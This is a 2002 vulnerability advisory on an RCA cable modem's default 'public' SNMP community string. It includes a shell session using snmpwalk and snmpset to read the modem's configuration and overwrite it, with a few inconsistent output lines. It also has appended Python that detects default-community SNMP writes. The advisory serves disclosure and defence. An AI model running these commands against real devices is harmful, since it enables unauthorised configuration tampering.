RCA Digital Cable Modem public SNMP Management Vulnerability

Published: 2002-03-30
Updated: 2002-03-30
Severity: Medium
Threat level: Server information disclosure
Error type: Design error
Exploitation method: Server mode
BUGTRAQ ID: 4377

Affected systems
RCA Digital Cable Modem 0.0DCM225E

Detailed description
RCA Digital Cable Modem is a cable modem.
The device ships with the public community string "public". A remote user can use this community string, through the 10.0.0.0/8 address space on which the SNMP interface listens, to view and modify the modem's configuration data.

Test code
<quote>
[gabi@pluto gabi]$ snmpwalk 192.168.100.1 public
system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572, HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS: PSOS 2.5.0
system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0
system.sysUpTime.0 = Timeticks: (141857) 0:23:38.57
system.sysContact.0 = unassigned sysContact
system.sysName.0 =
system.sysLocation.0 =
system.sysServices.0 = 79
[gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysName.0 s lame
system.sysName.0 = lame
[gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysLocation.0 s lame_cyty
system.sysName.0 = lame_city
[gabi@pluto gabi]$ snmpwalk 192.168.100.1 public
system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572, HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS: PSOS 2.5.0
system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0
system.sysUpTime.0 = Timeticks: (161396) 0:26:53.96
system.sysContact.0 = unassigned sysContact
system.sysName.0 = lame
system.sysLocation.0 = lame_city
system.sysServices.0 = 79
</quote>

Solution
None yet.

Related information
Gabriel A. Maggiotti <gmaggiot@ciudad.com.ar>.

References:
http://online.securityfocus.com/archive/1/264404
http://online.securityfocus.com/archive/1/264431

Related homepage:
http://www.rca.com/product/viewmodellist/browseproduct/0,2589,CI700094,00.html?
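To detect the behaviour shown in the session above (a SetRequest accepted with the community string public), a monitor can decode the SNMP message header and flag writes authorised only by a default community. The Python below is an added example, not part of the original advisory; the function names, the DEFAULT_COMMUNITIES list and the two sample packets are assumptions constructed for illustration.

```python
# Constructed samples only; nothing here is captured traffic.
DEFAULT_COMMUNITIES = {b"public", b"private"}  # assumption: strings to audit for
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest",
             0xA2: "GetResponse", 0xA3: "SetRequest", 0xA4: "Trap"}

def read_tlv(buf, off):
    """Decode one BER TLV at off; return (tag, value, offset_after_value)."""
    if off + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length = buf[off], buf[off + 1]
    off += 2
    if length & 0x80:  # long form: low 7 bits count the length bytes
        n = length & 0x7F
        if n == 0 or off + n > len(buf):
            raise ValueError("unsupported or truncated length")
        length = int.from_bytes(buf[off:off + n], "big")
        off += n
    if off + length > len(buf):
        raise ValueError("truncated TLV value")
    return tag, buf[off:off + length], off + length

def classify(packet):
    """Return (version, community, pdu_name) of an SNMPv1/v2c message."""
    outer, body, _ = read_tlv(packet, 0)
    t_ver, ver, off = read_tlv(body, 0)
    t_com, community, off = read_tlv(body, off)
    pdu_tag, _, _ = read_tlv(body, off)
    if (outer, t_ver, t_com) != (0x30, 0x02, 0x04):
        raise ValueError("not an SNMP community-based message")
    return int.from_bytes(ver, "big"), community, PDU_NAMES.get(pdu_tag, hex(pdu_tag))

def is_default_community_write(packet):
    """True when a SetRequest is authorised only by a default community."""
    _, community, pdu = classify(packet)
    return pdu == "SetRequest" and community in DEFAULT_COMMUNITIES

def tlv(tag, body):
    """Encode a short-form TLV; used only to build the samples below."""
    return bytes([tag, len(body)]) + body

def sample(pdu_tag, community, value):
    """Build a one-varbind message for sysName.0 (1.3.6.1.2.1.1.5.0)."""
    oid = tlv(0x06, bytes.fromhex("2b06010201010500"))
    pdu = tlv(pdu_tag, tlv(0x02, b"\x01") + tlv(0x02, b"\x00") * 2
              + tlv(0x30, tlv(0x30, oid + value)))
    return tlv(0x30, tlv(0x02, b"\x00") + tlv(0x04, community) + pdu)

SET_PUBLIC = sample(0xA3, b"public", tlv(0x04, b"lame"))  # write, as in the session
GET_PUBLIC = sample(0xA0, b"public", tlv(0x05, b""))      # read of the same OID
```

Feed `is_default_community_write` the UDP payload of packets sent to port 161; a True result on a management network means a device is still accepting writes under a default community.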